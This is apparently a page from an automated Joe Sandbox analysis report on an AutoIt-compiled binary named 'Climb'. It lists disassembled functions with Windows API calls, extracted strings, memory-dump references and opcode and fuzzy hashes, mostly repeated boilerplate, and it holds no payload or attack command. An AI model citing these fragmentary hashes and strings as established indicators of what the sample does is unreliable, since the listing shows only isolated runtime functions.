Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2f1b6483aec687989336e0618efc76718f796bff500f4997d19d7c8747775040
Instruction ID: d2fedcadde54262b82c2a79771baa66cb58ffb0ef47402a03ffd5530eb1429a3
Opcode Fuzzy Hash: 2f1b6483aec687989336e0618efc76718f796bff500f4997d19d7c8747775040
Instruction Fuzzy Hash: 9D91BF31604601AFD720DF25C888B1ABFE0FF45318F1489A9F5698B6A2C735ED85CB96

Function 00482793 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004832AF
Part of subcall function 0048327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 004832B7
Part of subcall function 0048327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004832C2
Part of subcall function 0048327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004832CD
Part of subcall function 0048327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 004832D5
Part of subcall function 0048327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 004832DD

Part of subcall function 00483205: RegisterWindowMessageW.USER32(00000004,?,00482964), ref: 0048325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00482A0A
OleInitialize.OLE32 ref: 00482A28
CloseHandle.KERNEL32(00000000,00000000), ref: 004C3A0D

Strings

0$U, xrefs: 00482A2E
4'U, xrefs: 00482948
d(U, xrefs: 00482964
$U, xrefs: 0048280A
vGN, xrefs: 00482868, 0048293C
(&U, xrefs: 00482932

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&U$0$U$4'U$d(U$vGN$$U
API String ID: 1986988660-2020303157
Opcode ID: 4870d4fff5d6fc879e9e7b485daeea933c4f9d66b8255cf2fde8f660bab6cbc3
Instruction ID: 2d941939983d05fbbe1d6887e477ad9f94fab8a483237aace37b8b8995f5544f
Opcode Fuzzy Hash: 4870d4fff5d6fc879e9e7b485daeea933c4f9d66b8255cf2fde8f660bab6cbc3
Instruction Fuzzy Hash: 8A71AEB19113008ECB88EFBAAD756593BE0FB6A306F40852ED409DB261FB744549EF58

Function 0048F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

t5U, xrefs: 0048F8E0
Variable must be of type 'Object'., xrefs: 004D48C6
t5U, xrefs: 004D463C
t5U, xrefs: 0048FBB1
t5Ut5U, xrefs: 0048F97E
t5U, xrefs: 004D45E9

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$t5U$t5U$t5U$t5U$t5Ut5U
API String ID: 0-2071010340
Opcode ID: c5c1059d56a082f7c3044387ddea9f6011bfa98ed9d482add79cb525ad85f74b
Instruction ID: dca70f04f6f2514f117a5fd9ce2f845f387b2805137430ecf7fe2f86aff322d9
Opcode Fuzzy Hash: c5c1059d56a082f7c3044387ddea9f6011bfa98ed9d482add79cb525ad85f74b
Instruction Fuzzy Hash: 85C2AD71E00204DFCB24EF58C890AAEB7F1BF59314F24896BE905AB351D339AD45CB99

Function 00490340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004915F2

Strings

t5U, xrefs: 004D5FF9
t5U, xrefs: 004906B7
t5Ut5U, xrefs: 0049075B
t5U, xrefs: 004D604D
t5U, xrefs: 00490A6A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5U$t5U$t5U$t5U$t5Ut5U
API String ID: 1385522511-3918352429
Opcode ID: 4acb3244edf27c72c05ccc05f772649d5ed681e3e713b31a13e5a8ba265aeca4
Instruction ID: e5494dbfafa3fd074a3fcf6602aa870077c4bfae5355896c5b9e33281d71b562
Opcode Fuzzy Hash: 4acb3244edf27c72c05ccc05f772649d5ed681e3e713b31a13e5a8ba265aeca4
Instruction Fuzzy Hash: 50B28B74A08301CFDB24CF19C490A2ABBE1BF99304F14496FE9898B351D779ED45CB9A

Function 004B90C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d5033b1c9e3ff8f9b4137ce3c79980d53ef3b3032f12c0f43fcc3793aabf622
Instruction ID: 8288474f7520ab43939842f1aa5f26de663c42c089f4cb76fe0e79244ba1c4ab
Opcode Fuzzy Hash: 9d5033b1c9e3ff8f9b4137ce3c79980d53ef3b3032f12c0f43fcc3793aabf622
Instruction Fuzzy Hash: 9FC10470904249AFDF11DFE9D841BEEBBB4AF1A300F14415AEA14A7392C7389D46CB79

Function 004835B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004835E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00483602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00483368,?), ref: 00483616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00483368,?), ref: 0048361F

Strings

edit, xrefs: 004835FC
AutoIt v3, xrefs: 004835D9, 004835DE, 004835DF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 49ee227d45e8d8c9f2bcf2c2f01e6de434275a60944cdadcffc1e9662e55fbc4
Instruction ID: 467b805782613a0e01322c7cd01116dd472ee86c27fc156b22c78f562d42c520
Opcode Fuzzy Hash: 49ee227d45e8d8c9f2bcf2c2f01e6de434275a60944cdadcffc1e9662e55fbc4
Instruction Fuzzy Hash: CAF017716403947AEB2147136C18E772FBDE7D7F51F02041EB904A61A0C2690889EBB0

Function 00483A95 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004C413B

Part of subcall function 00485851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004855D1,?,?,004C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00485871

Part of subcall function 00483A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00483A76

Strings

X, xrefs: 004C4109
Run Script:, xrefs: 004C4110
AutoIt script files (*.au3, *.a3x), xrefs: 004C411F
au3, xrefs: 004C4134

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
API String ID: 779396738-1954568251
Opcode ID: 2c4eb1dcd30d9f3112136fb5a278a6dd010edbbf9e14553825247be561912080
Instruction ID: 6fc2fa342b3d6bad499b398100a8ada356f4cf67739e0aa59ce4ed718f4b92d5
Opcode Fuzzy Hash: 2c4eb1dcd30d9f3112136fb5a278a6dd010edbbf9e14553825247be561912080
Instruction Fuzzy Hash: 3821C671A0025C9BCF01EF95C805BEE7BF8AF49718F00845EE445B7241DBF89A898F65

Function 004861A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004C5287

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00486299

Strings

Line %d: , xrefs: 004C5305
AutoIt - , xrefs: 0048620D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: b9b5872f0dfcad815168e3f4df438cc9506727d014c913fa9d3f166d3f707f9d
Instruction ID: 4ea5fe612924fe5ee84a52a9cb355a53e8ccc6b38ac4c4326df6a1034f6520b8
Opcode Fuzzy Hash: b9b5872f0dfcad815168e3f4df438cc9506727d014c913fa9d3f166d3f707f9d
Instruction Fuzzy Hash: BB41C4714083006EC750FB21DC45EDF7BE8AF55318F014E6FF985821A1EB78AA49CB9A

Function 004B8A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,OVL,004B894C,?,00549CE8,0000000C,004B89AB,?,OVL,?,004C564F), ref: 004B8A84
GetLastError.KERNEL32 ref: 004B8A8E
__dosmaperr.LIBCMT ref: 004B8AB9

Strings

OVL, xrefs: 004B8A30

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: OVL
API String ID: 2583163307-386720902
Opcode ID: 41a6e9c76ea716e6a2306e45f00e5d27ae14225a399ee7f609f6e0c4a1329f17
Instruction ID: 2cb283003bdd1c412cb7156911aceef7a1a174dec76d0ce399f4135fd98f8458
Opcode Fuzzy Hash: 41a6e9c76ea716e6a2306e45f00e5d27ae14225a399ee7f609f6e0c4a1329f17
Instruction Fuzzy Hash: 81016B326055601AC6206374AC45BFFAB5D4BAA738F29021FF8148B2C2DF7C8D82D5BD

Function 004858CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,004858BE,SwapMouseButtons,00000004,?), ref: 004858EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,004858BE,SwapMouseButtons,00000004,?), ref: 00485910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,004858BE,SwapMouseButtons,00000004,?), ref: 00485932

Strings

Control Panel\Mouse, xrefs: 004858ED

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 00b1d5545c965c834fb1cde559cdfbe39191a7c4a10b85c909c92188c62eda3c
Instruction ID: eddcf5e8484872aa5d3db6a4fed879c833e8563ec9317e8fa4fcd7db7565f58d
Opcode Fuzzy Hash: 00b1d5545c965c834fb1cde559cdfbe39191a7c4a10b85c909c92188c62eda3c
Instruction Fuzzy Hash: 27115AB5510618FFDB219F64DC849EF77B8EF05760F10885AE801E7210E2359E45A764

Function 00492B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00493006

Strings

CALL, xrefs: 00492FD6
bnN, xrefs: 00492B36, 00492E8D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$bnN
API String ID: 1385522511-3419149932
Opcode ID: a7aa51e323583c92c0e5a20371d9f45899f5472b0e1fd6db54a0e25fa2417756
Instruction ID: 593f33fcca166e4c596ae7a65fdbe109f38753337fd88265e8fd70a7d8dd8064
Opcode Fuzzy Hash: a7aa51e323583c92c0e5a20371d9f45899f5472b0e1fd6db54a0e25fa2417756
Instruction Fuzzy Hash: 4E22BE70608301AFCB14DF15C494A2ABBF1BF95304F14892FF4898B361D779E945CB5A

Function 004A014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004A09D8

Part of subcall function 004A3614: RaiseException.KERNEL32(?,?,?,004A09FA,?,00000000,?,?,?,?,?,?,004A09FA,00000000,00549758,00000000), ref: 004A3674

__CxxThrowException@8.LIBVCRUNTIME ref: 004A09F5

Strings

Unknown exception, xrefs: 004A0A02

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: ef0da7fe9343d3264580819a6bc4d45425e87f830d7dc5d6730e4fe118a95050
Instruction ID: 3f9bd7b31327d434a4c00d0d69dad9d6c2ccfbb2185f94e929c6a0e258d08fd3
Opcode Fuzzy Hash: ef0da7fe9343d3264580819a6bc4d45425e87f830d7dc5d6730e4fe118a95050
Instruction Fuzzy Hash: D3F0287080020C778B00BEA5DC428DF776C5E33318B50402BB914965D2FB39EA16C6C8

Function 005089B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00508D52
TerminateProcess.KERNEL32(00000000), ref: 00508D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00508F3A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 40ffb24c8912dbc0be4bb1dc2e5cacf5b655ff7ff6fe79cd2a86212defc7a10e
Instruction ID: 7572b18d3a8915cdae4f14552ec939bb8848d73ee66fc66aa065839e64b5c8d8
Opcode Fuzzy Hash: 40ffb24c8912dbc0be4bb1dc2e5cacf5b655ff7ff6fe79cd2a86212defc7a10e
Instruction Fuzzy Hash: 7E126A71A083019FD714DF28C484B6EBBE5FF84318F14895EE8899B292DB35ED45CB92

Function 00509AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00509B87
_strcat.LIBCMT ref: 00509BC6
_wcslen.LIBCMT ref: 00509C14

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: b88451e13758823ae6224c89e7caa0598668ded0a2f207a2c928826e5b3d0cfa
Instruction ID: 54e69fb5809cc554902215e94a245d8b3dc7296a407e81727a3b60e434e1e2bf
Opcode Fuzzy Hash: b88451e13758823ae6224c89e7caa0598668ded0a2f207a2c928826e5b3d0cfa
Instruction Fuzzy Hash: 07A17C31604105EFCB18DF19C5D19ADBBA1FF55318B6088AEE81A8F297DB35ED41CB84

Function 0049FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004861A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00486299

KillTimer.USER32(?,00000001,?,?), ref: 0049FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0049FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004DFE33

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 7e9bcd8f4557f9093e8ded629d00842120fb00ee75b73137c97479796f7486ed
Instruction ID: 7590fc95e0d6f103d27340ddb529e9b5cdead606e40e3c1a47649afaa4f0c4d7
Opcode Fuzzy Hash: 7e9bcd8f4557f9093e8ded629d00842120fb00ee75b73137c97479796f7486ed
Instruction Fuzzy Hash: 4A318471904354AFEB328F248855BE7BBEC9B12308F1044AFD5DB97342C3781A89DB55

Function 004B970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,004B97BA,FF8BC369,00000000,00000002,00000000), ref: 004B9744
GetLastError.KERNEL32(?,004B97BA,FF8BC369,00000000,00000002,00000000,?,004B5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,004A6F41), ref: 004B974E
__dosmaperr.LIBCMT ref: 004B9755

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 976a48feb58c23ab5e7d711f5368148f89d6f5968b40deea439b61533602f3eb
Instruction ID: 33250e76f942a0ba15c5a16dd044d7264eac9f3193e6ef48b40199c254924449
Opcode Fuzzy Hash: 976a48feb58c23ab5e7d711f5368148f89d6f5968b40deea439b61533602f3eb
Instruction Fuzzy Hash: 7A014C32620514EBCB059F9ADC05CEF7B69DB86330B24021AF91187290EE74DD42DBB4

Function 00491990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5433b2b8f3c58f05418f1b222c5aff9baf2ce2bfa8511a48e6a78c2bd1b28f7e
Instruction ID: df0e1289e41fb81650f30a9d8bd6fd52187268a21377799db984b6ff0b43deea
Opcode Fuzzy Hash: 5433b2b8f3c58f05418f1b222c5aff9baf2ce2bfa8511a48e6a78c2bd1b28f7e
Instruction Fuzzy Hash: 3832EF30A002159FCF20DF55C891AAEBBB1EF11318F15896BE8559B3A1D739ED40CB59

Function 0048396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00483A3C

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

